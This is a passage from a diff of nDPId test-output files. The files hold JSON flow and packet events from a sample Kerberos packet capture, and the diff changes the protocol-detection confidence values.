RbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjoWrS7jR3\/ZxrmkklAr5M\/UVPgZBz\/I0MBRDSrLAPTWRtuq1ZhbBTvDmh4JfIoeW\/NN+j\/BIs99fVl1IARv5kJzlvsrT0oz2PdU+R8Rl10wOzwJfT7yBOJecNjJCW1XhiL9p6LojffFaim+4jvn\/X89SbhRBqPbpCCF+yHmow+h4iZkD+HM6Jz3YsaIdiuQwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44s3moBTADAgES"} -00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} +00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337931220,"pkt":"AAgCHEeupB9ywglqCABFAAXME4FAAIAGeLmsEAgIrBAIyQBYwBgu4uDhNU2NClAYAQBUPQAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9aIPBwtNxkshczHziSeGRCcSiSC82vdTNNxZoZEqctTILmi\/cPiWo2kj2ZowTM5BfoTzgngU5zy1dblxSYtNNDo790fqKeln68pSwduOA5ekfZ2omIpLyTKi1Uzi5unXScqqLz0hKSsn\/40+2FcuWZE3ZvPuCmZ8SKPEnuc921KBrNqOj\/0DryAdSyI8er0AkE463j84WxyAtyNQDKDrp2ez6929oR6Rx5hbvL8GdKQY9jCLD2rnICMW89Hj9rOupV1OeH78XxxB7MSKm499oGFFneF9SM8YJwXSSMV673PLXubFj6DMrikD2G0Sl6xic8MhWvEbY+QDRNnfGPZAJvMaahqCk8wVuJCt+fkFop+b4toNRK\/McSX15qS4Oue1FamxPlWb8yeZyA7zxXMdyv\/9YdFl51KW6DMdV\/gNQhWVbNsnpHVbk+dZ3hmZuA13vS+pCaVgYWcY8TsTrrqDHUdvkhYH5y6bQXhaba0hTe8Bpqjtkm6\/RTu4J\/\/NKiUQMb9AOVNXKtDTvIFCVxCzbgDhWofcnihAdfiq3GVUSfoJVIjvbiKN6rurAhxZ5G7eeGZ0k0F7hodA7NNCDg1db\/i3Z0nn0sEe0z7aNhzE0ribx16c5Vcg7SzYKcbmYr2SOlrqyDG2wBIue4c+yHf8w4ERFzFfLLBAoUF6TY9mRoNRbKB\/qSAwbDd52vGpnn87rIVg\/QNGVIwMeb1KKPfdaC4wum+6\/FhZgWd0DbrZEhIXl\/8HN6zG+3ywmGFdeC2DFCmO4dETOrfkL6fl3T\/7ku0etROu1j+k26SXEG6Gge01yPUKju51MrjdtHnDZ1Ss42MB0XlUT6U6S5TlEIP\/8k9d0krm1cn0oRERln+NBIaJS\/B2711LZddv4tje7ItSqfXLacjoI7g80JWdXjf4l7SPcZiNeEbp1dMmXrQFZcbRN17kosEr4Tm2W4friYde8+zbAKqoXvVJXbnxAUwEVAGcV\/iPptIl\/xW9mtB0WPhDmkKXm2SfL9rih8OBbowoKkOmIJqQw8CRJRncVK0szyJok+ajlBHDiJgpcZUT8EmfmEr0qJ0qoMeuCqxs8Kf3IstAtgMR7lMBZda98WMq0J06Prxf9X\/7Sw5XHFF0Ihx2VyWiVN3DmzgADoDdivNlyaD8+Octjfvk+ZwiZGCsRMD1d7AL6HjQzrju4nysDHJIjeaKR52nWtCWAZ87qog1mDH+qjQPdMGkDr1FGrVbBXAZcR0K17tOKTw9bgQg9LvLMWeDMDNCEwvA8GHdr\/fAsBPK3PDKVyht8oNdhjar8xK
OZRvwzCOpoIBJjCCASKgAwIBEqKCARkEggEVYp6jTcDi\/gYVd9SDuEsi2VccBape1lXgcuGoeWG1ePxV5NidfJvDEi3F2VmdD04JFUaFb\/GRqNe9F8xWyy86xiJ3eKyJgAfyG7DDQnnFCeKC++4ORaBUkKnIeWwsFqQxh0aL1BrdknGP8u06G6P95r9esj7jUPDXQ1D0+jbs1WpWssKqZMQfUgV0eg9FoEGdVPsUmgNbZN2YPPrxhZ6CEgNOIC\/5aj8NqGMkPPX6xfYF4tbD74dZ3EfC4ry5KcIxNVYXU179as2C\/cihpEMrX8yiZtM91awDzQYUMPKt3\/3WSS96ycQo00pex7Pc1Jh3j49Cr5ckyWXD9SUXbCcOpUpip4\/Jz5Hvsliozjm5inKwUIBTJQ=="} -00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931220,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1549337931220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337931220,"pkt":"pB9ywglqAAgCHEeuCABFAAELAJhAAIAGkGOsEAjJrBAICMAWAb2ZMOb++YgxIFAYAP+McAAAQFskZ7b1ZYO5\/CuVOTe3ZqHs3nhqe1KXhnlBtJ\/qDgyo+sduQpC\/WLkmAdUvTJdV+CtGiwLoGf3Uio50ZE6gilnFEbzLLhzMIw4gwhRvlYwapNctw4G2EkpKfWO1MgMQ0yTGVxtfwAuP0ouYkDi\/6FI97AzDGvp\/R2LK19PAI403fVWk1Cbb2O\/YPOGH5a8hHowuR6tT8UugHDdGGl\/fWl8Wk4rCdi\/3gOYAhRVI6o2ZOHpv4GeBlLgJ6L2WL35O3jhh2e2dr0Fkd\/WG3ET2QLw9x3WRfncFn29f8nOqAUQDRH0="} 
00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1549337931221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337931221,"pkt":"AAgCHEeupB9ywglqCABFAAEsE4VAAIAGfVWsEAgIrBAIyQG9wBb5iDEgmTDn4VAYAP9zWgAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABdAAAAAAQAAPvWvNgjH\/I48OPxOa5H7a4JAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUswX\/mwh6g2ztwHi8\/dTRtvFzo0LVENq7tttT0JwVpKoIxijjsysss5HuCbI3DQGU7C0ILmrl+8phtVtu+2vBMSA9FKWe75R\/a+ST6oEaoDrDjzWfPqdU4xUCgD\/zK6J0O4Dsk+rO8nhy4LUmk="} 
@@ -78,12 +76,11 @@ 00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1549337937701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937701,"pkt":"AAgCHEeupB9ywglqCABFAAD6E6JAAIAGfWqsEAgIrBAIyQGFwBxI3pNwglNt+lAYAQCvQgAAMIQAAADMAgEKYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG2EupGhqTVA+Kxm5vIdkbfFjlPoe8DmjpF\/p2I3j7EwFjqQzavz5jy+cGzZKn09a9y0dyj\/mpeHcqpjjORB3KYfxKGHrDmiKKSYiCwqx86ee7rLKiQPX2z3RSwNa4fWz8uAjgw+I5CkXYbP6rNu"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337937703,"pkt":"pB9ywglqAAgCHEeuCABFAAEXANlAAIAGkBasEAjJrBAICMAdAFjHhcaiuhdcXlAYAQCv5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBFIcW1KoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
+00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337937703,"pkt":"AAgCHEeupB9ywglqCABFAAE+E6VAAIAGfSOsEAgIrBAIyQBYwB26F1xex4XHkVAYAQDp0AAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg1NlqlBQIDBJWNpgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} 
-00731{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337937724,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAN1AAIAGj8KsEAjJrBAICMAeAFgo\/29go\/Vk0VAYAQAVQgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4EwWkoanvLUiVA5eu8uG72\/EPy4+eHAiK9HbftleuqZ7DwBR\/wY3Sc5USTXPr6SJXdlLH8zfIE5MwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLSk9ITlNPTi1QQySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEUhxbUqgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
+00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1549337937724,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337937724,"pkt":"AAgCHEeupB9ywglqCABFAACYE6pAAIAGfcSsEAgIrBAIyQBYwB6j9WqFKP9wn1AYAQCbeQAAeBxjGZR555TmhlGtfWdB3hqYo6lYswe6vKpNUcrN1M7KGcxMIdPLYhZ04dECjGI6ypolTWuvt884Bi2lq0pIFbZFVKD3x\/BnUesSWAB9L0qg+5NPzwAEggckaZSGKHdd5sXD0ux4MNvoyw986qY1Nw=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937725,"flow_last_seen":1549337937725,"flow_idle_time":7580000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":1,"thread_ts_msec":1549337937725,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1549337937725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1549337937725,"pkt":"pB9ywglqAAgCHEeuCABFAAB4AONAAIAGkKusEAjJrBAICMAfAFi1TK\/3YmHJT1AYAQDj2wAAbj2wbk+derrxO0c0pxRSdruhR6\/j4Ui\/xNsBa8OfbfRkbAwdywbQynHUORFcFH8maukxsoLa+OhvD2a5+zDPKPlneJ\/sg2b\/GuIvr5ZD3Bg="} 
@@ -97,12 +94,11 @@ 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1549337940433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337940433,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAP9AAIAGkAOsEAjJrBAICMAhwAMZWx3nQJkKeFAYAP\/gGgAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBELB6nut18jCMG03H8TJyLvCf8wWF6F7BqJ4bg85nSMTOiCmzGy+a5tNrq0VYdAt2TCIZ2p1Ys\/DpnWvcPxOp0LCSoajHgQcBAQE\/\/\/\/\/\/8AAAAAVL504MDCo+3fnXZuQhY33A=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1549337951630,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1549337951630,"pkt":"pB9ywglqAAgCHEeuCABFAAETAQ1AAIAGj+asEAjJrBAICMAjAFj9jJo6lSyMo1AYAQB4vAAAAAAA52qB5DCB4aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBvTCBuqAHAwUAQIEAEKEcMBqgAwIBAaETMBEbD3RoZXJlc2Euam9obnNvbqIMGwpIQVBQWUNSQUZUox8wHaADAgECoRYwFBsGa3JidGd0GwpIQVBQWUNSQUZUpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEXdv8Z6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 
+00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1549337951631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1549337951631,"pkt":"AAgCHEeupB9ywglqCABFAAEYE9dAAIAGfResEAgIrBAIyQBYwCOVLIyj\/YybJVAYAQAREAAAAAAA7H6B6TCB5qADAgEFoQMCAR6kERgPMjAxOTAyMDUwMzM5MTBapQUCAwNKZqYDAgEZqQwbCkhBUFBZQ1JBRlSqHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSsgYsEgYgwgYUwYqEDAgETolsEWTBXMCagAwIBEqEfGx1IQVBQWUNSQUZULk9SR3RoZXJlc2Euam9obnNvbjAFoAMCARcwJqADAgEDoR8bHUhBUFBZQ1JBRlQuT1JHdGhlcmVzYS5qb2huc29uMAmhAwIBAqICBAAwCaEDAgEQogIEADAJoQMCAQ+iAgQA"} 
-00732{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337951631,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 